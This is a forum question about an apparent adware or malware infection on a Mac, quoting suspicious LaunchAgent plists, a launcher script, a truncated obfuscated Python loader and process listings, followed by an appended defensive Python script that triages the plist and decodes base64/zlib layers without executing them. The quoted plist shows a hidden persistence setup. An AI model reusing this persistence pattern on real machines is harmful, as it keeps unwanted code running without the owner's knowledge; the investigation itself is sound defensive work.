Strange Python script found on a Mac OS X client computer.

I was reviewing a Mac OS X machine (a late 2016 MacBook Pro) and found some bizarre scripts in the LaunchAgents folder.

8 -rw-r--r--  1 XX  wheel   500 30 Lug 07:18 com.1e1zq.plist
8 -rw-r--r--  1 XX  staff   386 30 Lug 07:18 com.KJ1sG.plist
8 -rw-r--r--  1 XX  wheel   402 21 Ago 10:17 com.VFUaG.plist

where XX is obviously the machine's user name.

If I cat one of those files, this is the content:

mbp:LaunchAgents XX$ cat com.1e1zq.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>1e1zq</string>
    <key>Program</key>
    <string>/Users/XX/Library/hVf9E/rVru6</string>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>3600</integer>
    <key>WatchPaths</key>
    <array>
        <string>/Users/XX/Downloads</string>
    </array>
</dict>
</plist>

Which is basically something that launches a Python script.

Here is the content of the Python script:

XX$ cat rVru6 
#!/usr/bin/env bash

cd /Users/XX/Library/hVf9E && python 1e1zq

The content of the other script is base64 encoded, but my limited knowledge of Python stops my investigation here. Before I wipe everything, can anyone give me a hint about what it is?

XX$ cat 1e1zq 
decompresst b64decode(((sc.py<module>s

I checked with ps aux and a Python process was running. This is the information from Activity Monitor:

cwd  /Users/Luxx/Library/search.amp
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/Python
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_locale.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/zlib.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_struct.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/binascii.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/time.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/select.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/fcntl.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/cStringIO.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/objc/_objc.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_collections.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/operator.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/itertools.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_heapq.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_ctypes.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_functools.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/strop.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/datetime.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/pyexpat.so
txt  /usr/lib/libexpat.1.dylib
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/CoreFoundation/_inlines.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/Foundation/_inlines.so
txt  /usr/share/icu/icudt57l.dat
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/CoreFoundation/_CoreFoundation.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/Foundation/_Foundation.so
txt  /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_hashlib.so
txt  /usr/lib/dyld
txt  /private/var/db/dyld/dyld_shared_cache_x86_64h
0    /dev/null
1    /dev/null
2    /dev/null
5    ->0xe2c607c2888f3c11
7    ->0xe2c607c2888f3b51
posted by elbuild 11.11.2018 - 23:00
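An added example (editor's code, not from the post): static triage of the LaunchAgent plist quoted above, which combines RunAtLoad, StartInterval and a WatchPaths entry on ~/Downloads to keep a program in a random-named ~/Library folder running, plus a helper that peels the base64/zlib wrapping the dump hints at without executing anything. The plist bytes are copied from the post; the wrapped payload is a constructed benign stand-in, and the heuristics (label without reverse-DNS prefix, junk directory names) are the editor's assumptions.

```python
import base64
import plistlib
import re
import zlib

# Plist content copied from the post above (XX = the user name, as in the post)
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>Label</key><string>1e1zq</string>
<key>Program</key><string>/Users/XX/Library/hVf9E/rVru6</string>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>3600</integer>
<key>WatchPaths</key><array><string>/Users/XX/Downloads</string></array>
</dict></plist>"""

# Assumed heuristic: ~/Library/<junk>/<junk> instead of an app bundle or /usr path
JUNK_DIR = re.compile(r"/Library/[A-Za-z0-9]{4,8}/[A-Za-z0-9]{4,8}$")

def triage_launch_agent(plist_bytes):
    """Static checks on one LaunchAgent plist; returns a list of findings."""
    d = plistlib.loads(plist_bytes)
    label = d.get("Label", "")
    program = d.get("Program") or (d.get("ProgramArguments") or [""])[0]
    findings = []
    if "." not in label:  # legitimate agents use reverse-DNS labels (com.vendor.x)
        findings.append("label without reverse-DNS prefix: %s" % label)
    if JUNK_DIR.search(program):
        findings.append("program in random-named ~/Library dir: %s" % program)
    if d.get("RunAtLoad") and d.get("StartInterval"):
        findings.append("runs at login and every %d s" % d["StartInterval"])
    if any(p.endswith("/Downloads") for p in d.get("WatchPaths", [])):
        findings.append("re-triggered on every change in ~/Downloads")
    return findings

def peel_loader(blob, max_layers=5):
    """Undo base64 -> zlib wrapping layers statically (nothing is exec'd).
    Returns (innermost bytes, number of layers peeled)."""
    data = blob
    for n in range(max_layers):
        try:  # binascii.Error (a ValueError) on non-base64, zlib.error on non-zlib
            data = zlib.decompress(base64.b64decode(data, validate=True))
        except (ValueError, zlib.error):
            return data, n
    return data, max_layers

# Constructed benign stand-in for the real payload, wrapped in two base64(zlib) layers
INNER = b"print('constructed sample, not the real payload')"
def make_sample_loader():
    layer1 = base64.b64encode(zlib.compress(INNER))
    return base64.b64encode(zlib.compress(layer1))
```

Running triage over every file in ~/Library/LaunchAgents and feeding the Program target to peel_loader lets the content be read before deciding whether to wipe the machine.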
0 answers